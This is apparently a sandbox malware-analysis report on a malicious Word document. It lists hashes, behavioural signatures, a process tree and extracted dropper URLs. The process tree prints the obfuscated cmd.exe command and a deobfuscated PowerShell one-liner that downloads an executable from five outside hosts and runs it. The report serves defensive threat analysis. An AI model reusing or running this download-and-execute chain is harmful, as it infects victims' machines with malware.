Overview

overview

10

Static

static

8

ed263a7838...18.doc

windows7-x64

10

ed263a7838...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2024, 07:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ed263a78384f69cde5daa07fe61dc990_JaffaCakes118.doc

  • Size

    147KB

  • MD5

    ed263a78384f69cde5daa07fe61dc990

  • SHA1

    27f54e69c2c3ac5b480907548104215d72273aca

  • SHA256

    75ed06f8a1cd5fae3d642273b0ab549d634b59ca55f6648e8d0f0c5f6896b7da

  • SHA512

    194620b1ef3c5de5e271c3c9accb792f51413efac5635228fe6b6a80e70dbad0c43a1a07925e7a6c023aae4af1b25f4d648db84bcc8a8c0526697b1bff34a3cc

  • SSDEEP

    1536:WFR81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9wq60WflV:88GhDS0o9zTGOZD6EbzCd7QV

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq
exe.dropper

http://13.114.25.231/NF4
exe.dropper

http://arcelectricnj.com/D
exe.dropper

http://lakunat.ru/N
exe.dropper

http://paulofodra.com.br/t9Nf

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed263a78384f69cde5daa07fe61dc990_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:560
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\OWXcIFjBpA\YLWOnlzHVGSD\DsaKFqtTET\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set B8=hfXsnaMYjJGzljOuSi8bq'CpxWkZw(+{t3/Romd65AE-N0 9@1H=,.}7);yrc2Fg\eI4$:Dv&&for %a in (68;15;38;37;51;21;26;15;50;21;57;68;20;32;9;51;4;65;28;43;36;19;13;65;60;32;46;44;65;32;53;25;65;19;22;12;17;65;4;32;57;68;11;70;20;51;21;0;32;32;23;69;34;34;49;39;61;53;61;67;33;53;55;53;49;55;47;34;28;23;43;60;36;4;32;65;4;32;34;32;0;65;37;65;3;34;5;12;71;65;36;23;0;5;3;65;33;34;37;3;1;43;1;17;12;65;3;34;61;44;25;41;9;20;48;0;32;32;23;69;34;34;49;33;53;49;49;67;53;61;40;53;61;33;49;34;44;62;67;48;0;32;32;23;69;34;34;5;59;60;65;12;65;60;32;59;17;60;4;13;53;60;36;37;34;70;48;0;32;32;23;69;34;34;12;5;26;15;4;5;32;53;59;15;34;44;48;0;32;32;23;69;34;34;23;5;15;12;36;1;36;38;59;5;53;60;36;37;53;19;59;34;32;47;44;1;21;53;16;23;12;17;32;29;21;48;21;56;57;68;26;23;15;51;21;44;35;42;21;57;68;20;15;28;46;51;46;21;18;39;40;21;57;68;38;62;38;51;21;19;19;32;21;57;68;32;27;17;51;68;65;4;71;69;32;65;37;23;30;21;64;21;30;68;20;15;28;30;21;53;65;24;65;21;57;1;36;59;65;5;60;0;29;68;7;41;17;46;17;4;46;68;11;70;20;56;31;32;59;58;31;68;20;32;9;53;70;36;28;4;12;36;5;38;62;17;12;65;29;68;7;41;17;52;46;68;32;27;17;56;57;68;15;41;42;51;21;3;6;5;21;57;66;1;46;29;29;10;65;32;43;66;32;65;37;46;68;32;27;17;56;53;12;65;4;63;32;0;46;43;63;65;46;18;45;45;45;45;56;46;31;66;4;71;36;26;65;43;66;32;65;37;46;68;32;27;17;57;68;17;59;44;51;21;27;32;42;21;57;19;59;65;5;26;57;54;54;60;5;32;60;0;31;54;54;68;12;70;13;51;21;27;17;19;21;57;73)do set 9L40=!9L40!!B8:~%a,1!&&if %a==73 powershell.exe "!9L40:~-456!""
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V/C"set B8=hfXsnaMYjJGzljOuSi8bq'CpxWkZw(+{t3/Romd65AE-N0 9@1H=,.}7);yrc2Fg\eI4$:Dv&&for %a in (68;15;38;37;51;21;26;15;50;21;57;68;20;32;9;51;4;65;28;43;36;19;13;65;60;32;46;44;65;32;53;25;65;19;22;12;17;65;4;32;57;68;11;70;20;51;21;0;32;32;23;69;34;34;49;39;61;53;61;67;33;53;55;53;49;55;47;34;28;23;43;60;36;4;32;65;4;32;34;32;0;65;37;65;3;34;5;12;71;65;36;23;0;5;3;65;33;34;37;3;1;43;1;17;12;65;3;34;61;44;25;41;9;20;48;0;32;32;23;69;34;34;49;33;53;49;49;67;53;61;40;53;61;33;49;34;44;62;67;48;0;32;32;23;69;34;34;5;59;60;65;12;65;60;32;59;17;60;4;13;53;60;36;37;34;70;48;0;32;32;23;69;34;34;12;5;26;15;4;5;32;53;59;15;34;44;48;0;32;32;23;69;34;34;23;5;15;12;36;1;36;38;59;5;53;60;36;37;53;19;59;34;32;47;44;1;21;53;16;23;12;17;32;29;21;48;21;56;57;68;26;23;15;51;21;44;35;42;21;57;68;20;15;28;46;51;46;21;18;39;40;21;57;68;38;62;38;51;21;19;19;32;21;57;68;32;27;17;51;68;65;4;71;69;32;65;37;23;30;21;64;21;30;68;20;15;28;30;21;53;65;24;65;21;57;1;36;59;65;5;60;0;29;68;7;41;17;46;17;4;46;68;11;70;20;56;31;32;59;58;31;68;20;32;9;53;70;36;28;4;12;36;5;38;62;17;12;65;29;68;7;41;17;52;46;68;32;27;17;56;57;68;15;41;42;51;21;3;6;5;21;57;66;1;46;29;29;10;65;32;43;66;32;65;37;46;68;32;27;17;56;53;12;65;4;63;32;0;46;43;63;65;46;18;45;45;45;45;56;46;31;66;4;71;36;26;65;43;66;32;65;37;46;68;32;27;17;57;68;17;59;44;51;21;27;32;42;21;57;19;59;65;5;26;57;54;54;60;5;32;60;0;31;54;54;68;12;70;13;51;21;27;17;19;21;57;73)do set 9L40=!9L40!!B8:~%a,1!&&if %a==73 powershell.exe "!9L40:~-456!""
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:812
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe "$udm='kuH';$qtJ=new-object Net.WebClient;$zDq='http://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq@http://13.114.25.231/NF4@http://arcelectricnj.com/D@http://lakunat.ru/N@http://paulofodra.com.br/t9Nf'.Split('@');$kpu='NRE';$quw = '865';$dFd='bbt';$tZi=$env:temp+'\'+$quw+'.exe';foreach($YAi in $zDq){try{$qtJ.DownloadFile($YAi, $tZi);$uAE='sMa';If ((Get-Item $tZi).length -ge 80000) {Invoke-Item $tZi;$irN='ZtE';break;}}catch{}}$lDj='Zib';"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2552

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      610528a458093697e63ec1bc57476c95

      SHA1

      8ac50b3166b512483762db2af2b22074eb8bbafd

      SHA256

      caf4f7b987561aa4fe520c022b2fc4d8f5e5d0fb3cf4f44344277740b48d1c5f

      SHA512

      869daf5856e6cfcaa5d2a3e5bef61683d5982bf330b83120d32734cd7dfaaf6d4b050aa54aa2bb201e6f6f8ec8370ac5899f2663289997af88a2111256d9e4fa

      Download Submit

    • memory/2480-4-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2480-2-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2480-0-0x000000002F2F1000-0x000000002F2F2000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2480-6-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2480-5-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2480-11-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2480-12-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2480-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2480-28-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2480-29-0x00000000716ED000-0x00000000716F8000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2480-30-0x0000000000590000-0x0000000000690000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2552-10-0x00000000029B0000-0x00000000029FF000-memory.dmp

      Filesize

      316KB

      Download